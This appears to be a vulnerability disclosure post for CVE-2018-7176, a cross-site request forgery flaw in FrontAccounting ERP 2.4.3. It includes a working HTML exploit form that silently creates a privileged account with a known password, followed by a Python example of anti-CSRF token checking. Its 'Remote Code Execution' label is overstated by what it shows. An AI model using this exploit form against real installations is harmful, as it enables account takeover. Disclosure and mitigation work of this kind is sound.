Cross Site Request Forgery- Front Accounting ERP 2.4.3 - CVE-2018-7176
Cross Site Request Forgery- Front Accounting ERP 2.4.3
By- Samrat Das
Hi Readers,
Recently, while performing some open source security assessment, I came across an ERP application, Front Accounting. Curious to explore its functionality, I set up a local copy and started playing around to find security vulnerabilities.
Title of the Vulnerability: Cross Site Request Forgery
Vulnerability Class: Remote Code Execution / Account takeover
Technical Details & Description: The application's form handlers accept state-changing requests without any anti-CSRF countermeasure, so a maliciously crafted HTML page hosted elsewhere can submit those requests on a logged-in user's behalf and have them executed directly.
CVE ID allocated: CVE-2018-7176
Product & Service Introduction: Front Accounting 2.4.3
Steps to Reproduce:
1. Visit the application.
2. Visit the User Permissions page.
3. Go to "Add user" and craft a CSRF exploit for that form. Host it on a server and send the link to the victim; when the victim clicks it while logged in, the forged request is executed.
Exploitation Technique: An attacker can perform application modification up to complete account takeover.
Severity Level: Critical
Security Risk: The presence of such a flaw can lead to user data compromise as well as account takeover.
Exploit code:
<html>
  <body>
    <form action="http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml" method="POST" enctype="text/plain">
      <input type="hidden" name="show_inactive" value="&user_id=Newadmin&password=Newadmin&real_name=New%20Admin&phone=&email=&role_id=8&language=C&pos=1&print_profile=&rep_popup=1&ADD_ITEM=Add%20new&_focus=user_id&_modified=0&_confirmed=&_token=Ta6aiT2xqlL2vg8u9aAvagxx&_random=757897.6552143205" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Affected Product Version: 2.4.3
Solution - Fix & Patch: The application should protect every state-changing form with a per-session anti-CSRF token that the server validates on submission, which mitigates Cross Site Request Forgery.
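To make the fix concrete, here is an added example of the synchronizer-token pattern that the solution above calls for. It is illustrative code written for this post, not FrontAccounting's own code: the session store, the `_token` field name (reused from the exploit above) and the request shapes are assumptions. It mints an unguessable token per session, embeds it in the rendered form, and rejects a POST whose token does not match the session's token, including a body modelled on the exploit above, whose `_token` value is fixed in the attacker's HTML and cannot match the victim's session. An Origin-header check is added as defence in depth.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Hypothetical in-memory session store (constructed for this example):
# session id -> {"csrf_token": ...}. A real app would use its session backend.
SESSIONS = {}

# Origin the application is served from (assumed for this example).
APP_ORIGIN = "http://localhost"


def new_session(session_id):
    """Create a session and mint a fresh, unguessable anti-CSRF token for it."""
    token = secrets.token_urlsafe(32)
    SESSIONS[session_id] = {"csrf_token": token}
    return token


def render_add_user_form(session_id):
    """Render the 'add user' form with the session's token embedded as a hidden field.
    Only the victim's own browser, loading this page from the app, ever sees this value;
    a page on an attacker's host cannot read it and so cannot forge a matching request."""
    token = SESSIONS[session_id]["csrf_token"]
    return (
        '<form action="/admin/users.php" method="POST">'
        f'<input type="hidden" name="_token" value="{token}" />'
        '<input name="user_id" /><input name="password" type="password" />'
        '<input type="submit" name="ADD_ITEM" value="Add new" /></form>'
    )


def csrf_check(session_id, method, headers, body):
    """Decide whether a request may change state. Returns (ok, reason).

    headers: dict of request headers; body: raw form-encoded request body.
    """
    if method.upper() not in ("POST", "PUT", "PATCH", "DELETE"):
        return True, "safe method"  # reads need no token
    session = SESSIONS.get(session_id)
    if session is None:
        return False, "no session"
    # Defence in depth: a browser sends Origin on cross-site form posts; reject
    # any value other than our own origin before even looking at the token.
    origin = headers.get("Origin")
    if origin is not None and origin != APP_ORIGIN:
        return False, "origin mismatch"
    fields = parse_qs(body, keep_blank_values=True)
    submitted = fields.get("_token", [""])[0]
    # Constant-time comparison against the token bound to this session.
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return False, "token mismatch"
    return True, "ok"


# Constructed request body in the shape of the exploit above: the attacker's page
# can only ship a fixed _token value, never the victim's session-bound one.
FORGED_BODY = (
    "user_id=Newadmin&password=Newadmin&real_name=New%20Admin&role_id=8"
    "&ADD_ITEM=Add%20new&_token=Ta6aiT2xqlL2vg8u9aAvagxx"
)


def demo():
    """Legitimate submission passes; the forged one is rejected."""
    token = new_session("victim-session")
    legit_body = f"user_id=alice&password=s3cret&ADD_ITEM=Add%20new&_token={token}"
    legit = csrf_check("victim-session", "POST", {"Origin": APP_ORIGIN}, legit_body)
    forged = csrf_check("victim-session", "POST", {}, FORGED_BODY)
    cross_origin = csrf_check("victim-session", "POST",
                              {"Origin": "http://attacker.example"}, legit_body)
    return legit, forged, cross_origin


if __name__ == "__main__":
    print(demo())
```

The token must be generated per session (or per form) from a CSPRNG and compared in constant time; a token that is static across sessions, or derivable from the user id, gives no protection because the attacker can embed it exactly as the exploit above embeds `_token`.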